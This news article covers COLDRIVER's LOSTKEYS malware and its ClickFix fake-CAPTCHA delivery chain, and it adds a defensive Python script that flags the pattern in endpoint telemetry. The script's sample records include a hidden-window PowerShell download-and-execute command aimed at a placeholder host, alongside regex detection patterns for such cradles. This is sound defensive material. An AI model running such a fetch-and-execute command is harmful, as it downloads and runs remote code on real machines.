COLDRIVER's New Malware LOSTKEYS Targets Western Entities

Generated by Coin World's AI agent
Wednesday, May 7, 2025, 2:57 pm ET · 1 min read

COLDRIVER, a Russian state-backed threat group, has been observed using a new malware family called LOSTKEYS to steal documents and system information from Western targets. The finding comes from a report published by Google Threat Intelligence on May 7. The malware is built to gain a foothold on a victim's machine and exfiltrate sensitive data, posing a significant risk to the targeted organizations and individuals.

LOSTKEYS is part of a broader campaign by COLDRIVER, a group that has previously been linked to Russia's Federal Security Service (FSB). The group is best known for credential phishing, harvesting login credentials and other sensitive information from its targets. Deploying LOSTKEYS marks an evolution in its methods: rather than relying on stolen credentials alone, the group is now developing and fielding its own tooling to evade detection and maintain access.

The malware is delivered through a four-stage chain. It begins with a lure website that displays a fake CAPTCHA; when the visitor "verifies", a PowerShell command is copied to the clipboard and the page prompts the user to paste it into the Windows Run prompt and execute it (the so-called ClickFix social-engineering pattern). That command retrieves the second stage, which performs evasion checks on the device before fetching the final payload, after which LOSTKEYS is installed. Once running, LOSTKEYS steals files matching a targeted set of extensions and directories and sends system information and a list of running processes back to COLDRIVER. According to Google, the stages of the attack are served from the address 165.227.148[.]68.
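A defender's first question about a chain like this is what it looks like in endpoint telemetry. The following is an added example, not code from Google's report or from the malware itself: it scores constructed process-creation and network records for the ClickFix shape described above (an interpreter launched from explorer.exe, which is what pasting into the Run box produces, with a hidden window, a download cradle or an encoded command) and separately for contact with the staging address the article publishes. The command lines, paths and the `stage.example.invalid` host are constructed placeholders; only the IP is from the report.

```python
import re

# Staging address published in the article for this campaign (defanged as printed).
LOSTKEYS_STAGING_IP = "165.227.148[.]68"

# A ClickFix-style launch has a recognisable shape: the victim pastes the
# clipboard contents into the Win+R Run box, so the parent process is
# explorer.exe, and the pasted command almost always hides its window and
# fetches or decodes a further stage. These are generic indicators, not the
# campaign's actual command line.
INDICATORS = {
    "download cradle": re.compile(
        r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I),
    "invoke-expression": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "encoded command": re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I),
    "hidden window": re.compile(r"(^|\s)-w(indowstyle)?\s+hidden\b", re.I),
}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}


def refang(ioc: str) -> str:
    """Turn a defanged indicator ('1.2.3[.]4', 'hxxp://') back into a matchable one."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the reasons (possibly none) this record looks like a ClickFix
    launch or like contact with the published staging host."""
    reasons = []
    parent = basename(event.get("parent", ""))
    image = basename(event.get("image", ""))
    cmdline = event.get("cmdline", "")

    matched = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    if parent == "explorer.exe" and image in INTERPRETERS and matched:
        reasons.append(f"{image} spawned by explorer.exe (Run box) with {', '.join(matched)}")

    ioc = refang(LOSTKEYS_STAGING_IP)
    if ioc in refang(cmdline) or event.get("dest_ip") == ioc:
        reasons.append(f"contacts published staging host {LOSTKEYS_STAGING_IP}")
    return reasons


def scan(events: list) -> list:
    """Scan records and return (index, reasons) for every one that fires."""
    findings = []
    for idx, event in enumerate(events):
        reasons = score_event(event)
        if reasons:
            findings.append((idx, reasons))
    return findings


# Constructed sample records (not real telemetry), shaped like a Sysmon
# Event ID 1 (process create) / Event ID 3 (network connect) export.
SAMPLE_EVENTS = [
    {   # benign: a user opening a file from Explorer
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\notepad.exe",
        "cmdline": r'"C:\Windows\System32\notepad.exe" C:\Users\alice\notes.txt',
    },
    {   # ClickFix shape: PowerShell pasted into Run, hidden window, download cradle
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": 'powershell -w hidden -c "iex (iwr http://stage.example.invalid/a -UseBasicParsing)"',
    },
    {   # legitimate admin script started by the Task Scheduler service: no alert
        "parent": r"C:\Windows\System32\svchost.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\ops\backup.ps1",
    },
    {   # network record: an interpreter reaching the address from the report
        "parent": r"C:\Windows\explorer.exe",
        "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "cmdline": "powershell -c Get-Date",
        "dest_ip": "165.227.148.68",
    },
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}:")
        for r in reasons:
            print("  -", r)
```

The parent-process condition is what keeps the rule quiet on ordinary administration: the scheduled backup script in the sample uses `-ExecutionPolicy Bypass` but is not launched from explorer.exe and carries no cradle, so it does not fire. The IP match is deliberately separate from the behavioural rule, since infrastructure changes faster than the pasting technique does.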

Google has already taken steps to limit the damage LOSTKEYS can do, including adding the lure websites to its Safe Browsing blocklist so that Chrome and other Safe Browsing clients warn users before they reach the fake CAPTCHA page.

COLDRIVER is known for phishing high-profile Western targets such as former diplomats and journalists. In January 2024 it was seen deploying a malware called "Spica", a backdoor that can execute arbitrary shell commands and download or upload files. The discovery of LOSTKEYS underscores the ongoing threat posed by state-sponsored groups, which target organizations and individuals in Western countries to obtain valuable information or disrupt operations. For defenders, the practical lesson is to treat the delivery path as the detection opportunity: block the lure sites, alert on interpreters launched from the Run prompt, and block the published staging address.

Google Threat Intelligence's public write-up of LOSTKEYS, including the infection chain and the indicators it published, gives organizations what they need to hunt for and block the campaign. Sharing this kind of detail promptly is essential to keeping pace with state-sponsored intrusion groups.
